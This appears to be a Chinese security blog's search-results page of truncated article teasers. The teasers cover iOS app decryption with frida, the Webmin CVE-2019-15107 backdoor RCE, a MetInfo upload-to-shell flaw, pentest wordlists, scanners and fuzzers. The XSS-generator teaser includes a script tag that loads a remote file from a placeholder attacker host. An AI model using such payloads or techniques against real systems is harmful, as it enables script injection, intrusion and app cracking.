搜索 “注入”

不再关注网络安全

IPA破解系列一《砸壳》,从越狱设备中提取解密的ipa

IPA破解系列一《砸壳》,从越狱设备中提取解密的ipa
  • 2019-09-12
  • Crack
  • 1.4万 阅读

frida-ios-dump 砸壳IPA frida-ios-dump基于frida提供的强大功能,通过注入js实现内存dump然后通过python自动拷贝到电脑生成IPA文件,可实现真正的一键dump砸壳IPA为实现破解IPA做准备。 frida-ios-dump使用 在手机和mac电脑上面安装fridasudo pip install -r requirements.txt --upgrade (Python 2.7)通过USB运行usbmuxd/ipr...

Webmin 小于等于 1.920 – Unauthenticated RCE

Webmin 小于等于 1.920 – Unauthenticated RCE
  • 2019-09-03
  • Vulndb
  • 3244 阅读

EDB-ID: 47230 CVE-2019-15107 本日由 Vendor 在@defcon AppSec Village 发布,修复了这个漏洞。 Webmin 必须更新到1.930版本。Exploit-DB LinkCVE-Mitre LinkDownload defcon_webmin_unauth_rce.rb (Metasploit) 这个漏洞是由一名不知名的黑客秘密种植的,他成功地在其构建基础架构中的某个时刻成功注入了一个后门,令人惊讶地持...

跨站脚本XSS Payloads生成器

跨站脚本XSS Payloads生成器

xss_payloads xss_payloads是一个基于PHP的跨站脚本XSS Payloads生成器。 用法 在您的应用中找到XSS vuln获取PoC漏洞:alert(1) 等等在某处托管这些payloads使用vuln将其中一个payloads拉入应用程序 <script src="http://attackerip/file.js"></script>利用 js vs php文件 一些文件是纯JavaScript.js文...

SaiDict:弱口令/敏感目录/敏感文件等渗透测试常用字典

SaiDict:弱口令/敏感目录/敏感文件等渗透测试常用字典

SaiDict 渗透测试字典 该项目维护者收藏了弱口令,敏感目录,敏感文件等渗透测试常用攻击字典。用于项目的安全审计与安全检测。 渗透测试字典项目 目前字典的目录大概分布如下: 账户字典 |-常用弱密码 |-常用账户名 |-中国人名拼音 |-常用手机号 fuzz字典 |-LDAP注入 |-SQ...

Konan – 高级Web目录扫描爆破工具,支持多线程/代理/字典/子目录等

Konan – 高级Web目录扫描爆破工具,支持多线程/代理/字典/子目录等

Konan - Web目录扫描程序 Konan是一个开源的用于Web目录扫描的工具,针对目录和文件名。类似的还有DirBuster,dirmap等。下面也对其它类似工具的功能对比。 Konan目录扫描 支持平台 LinuxWindowsMacOSX 同类工具功能对比 功能Konandirsearchdirbgobuster多线程yesyesyesyes支持多扩展yesyesnonoHTTP代理支持yesyesyesyes...

Bashter:一个WEB爬虫扫描器分析框架

Bashter:一个WEB爬虫扫描器分析框架

Bashter介绍 Bashter是一个WEB爬虫扫描器(基于Shell脚本)。非常适合做Bug挖掘或渗透测试。它的设计类似于框架,因此您可以轻松添加用于检测漏洞的脚本。 Bashter爬虫界面 Bashter特性 网络爬虫收集输入表格检测配置错误的CORS检测丢失的X-FRAME-OPTIONS(Clickjacking Potential)通过URL检测反射的XSS通过表格检测反射的XSS...

Yaazhini:一款免费的Android APK和API漏洞扫描器

Yaazhini:一款免费的Android APK和API漏洞扫描器

Yaazhini APK和API漏洞扫描 Yaazhini是一款Android APK和API的免费漏洞扫描程序。您可以轻松扫描任何Android应用程序的APK和API,并找到漏洞,支持导出APK和API的漏洞报表。 Android APK漏洞扫描器 Android Rest API漏洞扫描器 Yaazhini下载与使用 系统要求 系统Mac OSX(64位),Windows(64位和32位)内存最低使用量4GB...

metinfo <= 6.2.0前台任意文件上传漏洞GetShell

metinfo <= 6.2.0前台任意文件上传漏洞GetShell
  • 2019-07-16
  • Vulndb
  • 3737 阅读

Metinfo 存在一个前台任意文件上传漏洞。攻击者可以通过该漏洞直接获取网站权限GetShell,漏洞影响至 Metinfo 最新版,以下是分析文。 漏洞环境 Windows环境PHP版本<=5.3 环境 影响版本 metinfo <= 6.2.0(目前最新版本为 6.2.0 ) 漏洞分析 /app/system/include/module/uploadify.class.php ...

Dwarf:基于PyQt5和frida的强大全功能arch/os逆向工程调试器

Dwarf:基于PyQt5和frida的强大全功能arch/os逆向工程调试器

Dwarf介绍 Dwarf是一个逆向工程调试器,建立在各种框架和逻辑之上。一开始,它只是一个实验,主要在Android上运行而设计的,但随着发展,由于它们共享同一个核心,因此可以轻松添加对iOS的支持。如今,主要得益于社区的努力以及开源是道路(当然还有frida的力量),Dwarf可以在任何操作系统上调试逆向工程(感谢PyQt的)。类似的还有有ra...

Rustbuster:强大的模糊测试(Fuzzer)和信息枚举发现工具

Rustbuster:强大的模糊测试(Fuzzer)和信息枚举发现工具

Rustbuster介绍 Rust是一种令人惊叹的系统编程语言。它具有强大而创新的想法,Rustbuster是作者学习Rust并造出来的产物,兼具DirBuster,Gobuster,wfuzz,Patator的http_fuzz和IIS Short Name Scanner的主要功能。 Rustbuster是的目标是重新实现DirBuster等效项目。它最终变成了在不同情况下有用的模块集合。拥有适用于大多数常见Web...